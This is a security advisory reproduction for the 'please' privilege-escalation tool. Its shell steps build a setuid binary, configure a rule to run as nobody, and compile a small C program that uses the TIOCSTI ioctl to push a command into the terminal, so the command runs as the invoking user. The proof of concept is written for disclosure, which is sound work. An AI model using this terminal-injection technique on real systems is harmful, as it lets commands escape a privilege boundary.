GHSA-cgf8-h3fp-h956

$ cd "$(mktemp -d)" $ git clone --depth 1 https://gitlab.com/edneville/please.git $ cd please/ $ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9 $ cargo test && cargo build --release $ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini $ sudo chown root:root ./target/release/please $ sudo chmod u+s ./target/release/please $ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c #include <sys/ioctl.h> int main(void) { const char *text = "id\n"; while (*text) ioctl(0, TIOCSTI, text++); return 0; } TIOCSTI_C_EOF $ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c $ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody